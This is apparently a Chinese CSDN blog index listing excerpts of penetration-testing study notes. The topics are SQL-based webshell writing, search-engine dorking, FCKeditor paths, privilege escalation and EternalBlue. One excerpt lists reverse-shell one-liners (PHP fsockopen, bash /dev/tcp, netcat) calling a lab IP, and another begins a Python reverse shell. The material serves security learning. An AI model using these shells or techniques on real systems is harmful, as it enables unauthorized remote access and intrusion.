![](https://img-blog.csdnimg.cn/20201014180756916.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
WEB安全
super小明
It's not what we do once in a while that shapes our lives. It's what we do consistently.
展开
-
【知识整理】利用SQL语句写shell的方法
利用SQL语句写shell的方法要利用sql写shell就需要在配置中满足以下条件:在mysql的配置文件my.ini中,secure_file_priv为空(被注释掉或不填)或者secure_file_priv配置是目录地址。未开启全局GPC关于mysql的secure_file_priv属性得多说几句当secure_file_priv为空时,mysql对导入导出文件是没有限制的...原创 2020-03-22 01:04:15 · 3526 阅读 · 1 评论 -
【知识整理】搜索引擎hacking语法整理
hacking语法有效的信息搜集方式是挖漏洞成功的一半信息泄露漏洞语法构造site:<指定站点> filetype:<文件类型> <文件包含的内容># 常用的方式举例filetype:txt 登陆filetype:xls 登陆filetype:doc 登陆...原创 2020-03-21 23:48:21 · 1476 阅读 · 0 评论 -
【知识整理】搜索引擎的艺术
搜索语法搜索引擎的搜索语法是一个”捕鱼技“,能提高我们在渗透过程中的效率常用的搜索关键字关键字说明site在指定的网站中进行搜索intitle搜索标题中含有关键字的网页inurl搜索URL中存在的关键字网页intext搜索正文中含有关键字的网页filetype搜索指定文件类型-关键字筛去搜索结果中包含“关键字”的网页在搜索引...原创 2020-01-27 23:32:28 · 216 阅读 · 0 评论 -
【编辑器漏洞】 FCKeditor敏感目录
FCKeditor敏感信息查看版本信息/FCKEditor/editor/dialog/fck_ about.html/FCKeditor/_ whatsnew.html默认上传页面/FCKEditor/editor/filemanager/browser/default/ browser.html/FCKEditor/editor/ilemanager/browser/default...原创 2020-01-27 00:59:18 · 834 阅读 · 0 评论 -
【知识整理】渗透思路总结
渗透思路总结文章目录渗透思路总结Hacker语法网站IP查找网站IP验证子域名查找旁站查找C段扫描网站支持的HTTP方法使用NMAP脚本扫描使用OPTIONS方法使用KALI中CURL漏洞扫描端口服务扫描网站指纹扫描网站目录扫描漏洞利用(完善中)SQL注入XXEXSSCSRFSSRFCRLF命令执行漏洞文件上传漏洞解析漏洞文件包含漏洞逻辑漏洞系统提权FINAL渗透报告的撰写进行信息收集,根据开...原创 2020-01-04 22:47:15 · 1910 阅读 · 0 评论 -
【知识整理】简单的系统提权
系统提权文章目录系统提权Windows与Linux系统的权限划分Window本地提权使用Sysinternal suite中的Psexec设置时间任务使用sc创建一个系统服务注入进程提权***(隐蔽痕迹)使用kali上的集成工具脏牛提权脏牛提权步骤VMware共享文件虚拟机中的共享文件路径Windows与Linux系统的权限划分本地提权系统账号之间权限隔离操作系统的安全基础用户空间...原创 2019-12-13 21:04:39 · 318 阅读 · 0 评论 -
【DVWA】反弹shell实验
反弹shell实验实验环境:metasploitable2;dvwa-linux版##操作过程进入kali的web服务根目录/var/www/html,写入getshell.py的python程序#leafpad getshell.pyimport socket,subprocess,oss=socket. socket( socket.AF_INET , socket. SOC...原创 2019-12-13 20:35:04 · 1299 阅读 · 0 评论 -
【知识整理】Getshell方法整理
Getshellphpphp -r '$sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");'bashbash -i >& /dev/tcp/192.168.37.131/8080 0>&1netcatrm /tmp/f;mk...原创 2019-12-05 22:41:50 · 1896 阅读 · 0 评论 -
【漏洞复现】永恒之蓝漏洞
永恒之蓝漏洞复现使用msfconsole来对ms17-010来进行扫描和利用靶机:win7-x64测试机:kali扫描ms17-010漏洞在kali中启动使用msfconsole启动msfconsole使用search ms17-010搜索关于ms17-010的模块先调用搜索到的模块,再查看搜索模块的配置选项需要设置IP地址,确认设置信息都没用遗漏后,运行扫描发现漏洞。可以使用...原创 2019-12-05 19:30:59 · 362 阅读 · 0 评论 -
【知识整理】HTTP响应
HTTP响应在接收到一个请求后,服务器会返回一个HTTP响应。HTTP响应包括:状态行、响应报头和响应正文01.状态行状态行包括:HTTP版本、状态码、以及解释状态码的简单短语,格式如下:HTTP-Version Status-Code Reason-phrase CRLF其中,状态码由三位数字组成,共有5大类33种,其第一个数字指定了响应类别,取值为1~5,后面两位没有明确的规定。...原创 2019-12-05 19:21:44 · 891 阅读 · 0 评论 -
【知识整理】Nmap与Masscan
Nmap与Masscan文章目录Nmap与MasscanNmap命令核心功能Masscan命令Namp与Masscan的对比NmapNmap ("Network Mapper(网络映射器)”)是一款开放源代码的网络探测和安全审核的工具。设计目标是快速地扫描大型网络,当然用它扫描单个主机也没有问题。使用原始IP报文来发现网络上有哪些主机,那些主机提供什么服务(应用程序名和版本),那些服...原创 2019-12-05 19:19:10 · 2991 阅读 · 0 评论